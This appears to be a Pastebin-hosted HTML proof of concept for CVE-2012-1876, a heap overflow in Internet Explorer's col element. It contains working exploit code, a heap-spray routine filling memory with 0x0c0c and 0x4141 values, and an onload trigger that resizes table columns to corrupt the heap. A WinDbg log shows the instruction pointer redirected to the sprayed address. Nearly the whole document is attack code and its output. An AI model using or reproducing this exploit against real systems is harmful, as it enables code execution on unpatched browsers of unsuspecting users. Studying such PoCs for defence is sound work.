document.write('
Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. <html>
  2. <head>
  3. <title>CVE-2012-1876 PoC</title>
  4. </head>
  5. <body onload="_crash()">
  6. <TABLE style="table-layout: fixed;">
  7.     <colgroup id="cg" width="2021161">
  8.     <col id="cl" span="2">
  9.     <col>
  10.     </colgroup>
  11.     <TR>
  12.         <TD>XXXX</TD>
  13.     </TR>
  14. </TABLE>
  15. <script>
  16. /*******
  17. CVE-2012-1876 IE col element heap overflow PoC
  18. Canberk Bolat - cbolat.blogspot.com
  19.  
  20. cg\'s width = 2021161 (2021161 * 100 = 0c0c0c04) (Blink->Flink = cg\'s width)
  21.  
  22. (1014.1158): Access violation - code c0000005 (first chance)
  23. First chance exceptions are reported before any exception handling.
  24. This exception may be expected and handled.
  25. eax=0c0c0c04 ebx=02e2bae8 ecx=008cdf88 edx=0c0c0c0c esi=008de480 edi=008983e0
  26. eip=0c0c0c0c esp=02e2b9fc ebp=02e2ba9c iopl=0         nv up ei pl nz na po nc
  27. cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
  28. 0c0c0c0c 0c0c            or      al,0Ch
  29. 1:019> !heap -x 0c0c0c0c
  30. List corrupted: (Flink->Blink = 0c0c0c04) != (Block = 00890850)
  31. HEAP 00830000 (Seg 00830000) At 00890848 Error: block list entry corrupted
  32.  
  33. List corrupted: (Blink->Flink = 0c0c0c04) != (Block = 0089d458)
  34. HEAP 00830000 (Seg 00830000) At 0089d450 Error: block list entry corrupted
  35.  
  36. List corrupted: (Blink->Flink = 0c0c0c04) != (Block = 008a2f38)
  37. HEAP 00830000 (Seg 00830000) At 008a2f30 Error: block list entry corrupted
  38.  
  39. ERROR: Block 008ccf90 previous size 36d3 does not match previous block size 12
  40. HEAP 00830000 (Seg 00830000) At 008ccf90 Error: invalid block Previous
  41. **********/
  42.  
  43. var targetObj = document.getElementById("cl");
  44.  
  45. function spray() {
  46.     for(S="\\u0c0c",k=[],y=0;y++<197;)y<20?S+=S:k[y]=["\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c" + S.substr(60) +"\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141"].join("")
  47. }
  48.  
  49. function _crash() {
  50. spray();
  51. //alert("OK");
  52. targetObj.chOff = 10;
  53. targetObj.span = 400;
  54. }
  55. </script>  
  56. </body>
  57. </html>
');